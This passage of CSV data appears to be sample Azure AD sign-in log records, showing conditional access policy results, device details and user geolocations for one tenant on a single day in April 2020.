['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:05,"{'operatingSystem': 'Windows 10', 'deviceId': '51dc4855-d402-41ae-85fc-32714f2b813b', 'browser': 'Edge 81.0.416', 'displayName': 'ndicola-sl3', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",77c67fc7-1075-45f8-a369-a7b3046f7500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],{'errorCode': 0},Nicholas DiCola (SECURITY JEDI),142512c7-f006-46ae-909c-14fa7bf6a887,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,77c67fc7-1075-45f8-a369-a7b3046f7500,SigninLogs,Sucess,38.47222137,-77.41989899
+433,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:48.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,20e5a7f1-ff54-47c6-b1af-e0118a1a7a7a,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Block Access JulianI', 'result': 'success', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'JulianI Exchange native controls', 'result': 'success', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 16:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",e5856cfd-3e84-4d67-b30b-c1cef1961a00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,e5856cfd-3e84-4d67-b30b-c1cef1961a00,SigninLogs,Sucess,50.6406517,5.572050095
+434,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,40:03.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,bd67acb2-afc5-4d77-a46b-4843217ed84e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:40,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",aa57d52a-288e-488c-a4a9-011b113b1b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,aa57d52a-288e-488c-a4a9-011b113b1b00,SigninLogs,Sucess,33.7984581,-84.38828278
+435,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:54.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ae7c1b8a-f967-43d8-8712-31a4fea3747d,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 16:08,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",49d0cee2-6349-4d99-b7a5-a1e60d3a5800,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,49d0cee2-6349-4d99-b7a5-a1e60d3a5800,SigninLogs,Sucess,32.32146072,34.85319901
+436,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:24.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7605a8e5-ee10-4c85-8199-e31ac0026b20,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",93d60bd4-ad49-40a5-9c6c-157d58c21800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,93d60bd4-ad49-40a5-9c6c-157d58c21800,SigninLogs,Sucess,33.7984581,-84.38828278
+437,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:23.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1cc0b1c3-b3d9-4400-9bf1-105aa2034140,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,O365 Suite UX,4345a7b9-9a63-4910-a426-35363201d503,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",0a70c0cd-a111-442a-87bb-4de878601d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,0a70c0cd-a111-442a-87bb-4de878601d00,SigninLogs,Sucess,33.7984581,-84.38828278
+438,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:47.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3eb96fa0-2764-4185-ab0f-c7365f321059,Microsoft.aadiam,Microsoft.aadiam,,CTFUser2,4,US,Dynamics 365 Portal,bab47555-038a-4434-a931-96cc6091cdd7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 18.18363'}",a54beb90-f65e-4146-ae84-8533dca02700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.1869888305664, 'latitude': 47.68061828613281}, 'state': 'Washington', 'city': 'Kirkland'}",none,none,none,none,[],{'errorCode': 0},CTFUser2,d6166cfc-e0a3-43ce-bc64-761185c4082f,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,a54beb90-f65e-4146-ae84-8533dca02700,SigninLogs,Sucess,47.68061829,-122.1869888
+439,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,54:17.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3053b4e4-7c59-43fb-a3f5-9a8f5f02e1f9,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,09/04/2020 16:54,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",6f905d6a-b8b5-48fe-8361-59d7c6401a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,6f905d6a-b8b5-48fe-8361-59d7c6401a00,SigninLogs,Sucess,33.7984581,-84.38828278
+440,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:14.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e975c969-becd-459f-9baa-d4532d14bdf5,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Block Access JulianI', 'result': 'success', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'JulianI Exchange native controls', 'result': 'success', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 